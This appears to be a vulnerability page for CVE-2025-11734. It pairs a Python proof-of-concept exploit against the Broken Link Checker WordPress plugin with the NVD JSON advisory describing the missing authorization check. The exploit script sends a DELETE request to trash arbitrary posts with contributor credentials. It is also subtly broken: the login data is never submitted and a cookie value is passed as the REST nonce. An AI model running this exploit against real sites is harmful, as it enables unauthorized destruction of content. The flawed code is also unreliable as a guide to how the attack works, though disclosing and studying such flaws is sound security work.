CVE-2025-11734

import requests import json # CVE-2025-11734 PoC - Broken Link Checker Plugin Authorization Bypass # Target: WordPress site with Broken Link Checker plugin <= 1.2.5 target_url = "http://target-wordpress-site.com" username = "contributor_user" password = "contributor_password" # Step 1: Authenticate and get nonce session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { "log": username, "pwd": password, "wp-submit": "Log In" } # Step 2: Delete arbitrary post via vulnerable REST API endpoint post_id_to_delete = 123 # Target post ID api_url = f"{target_url}/wp-json/aioseoBrokenLinkChecker/v1/post" headers = { "Content-Type": "application/json", "X-WP-Nonce": session.cookies.get("wordpress_test_cookie") or "" } payload = { "id": post_id_to_delete } # Send DELETE request to delete arbitrary post response = session.delete(api_url, json=payload, headers=headers) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") # Note: This PoC demonstrates the authorization bypass vulnerability # The attacker can delete any post without proper authorization check

{"cve": {"id": "CVE-2025-11734", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:44.910", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Broken Link Checker by AIOSEO – Easily Fix/Monitor Internal and External links plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization in all versions up to, and including, 1.2.5. This is due to the plugin registering a REST API endpoint that only checks for a broad capability (aioseo_blc_broken_links_page) that is granted to contributor level users, without verifying the user's permission to perform actions on the specific post being targeted. This makes it possible for authenticated attackers, with contributor level access and above, to trash arbitrary posts via the DELETE /wp-json/aioseoBrokenLinkChecker/v1/post endpoint."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3390304/broken-link-checker-seo", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0254cd1b-f8f6-400e-a48e-81bd553fe8d1?source=cve", "source": "[email protected]"}]}}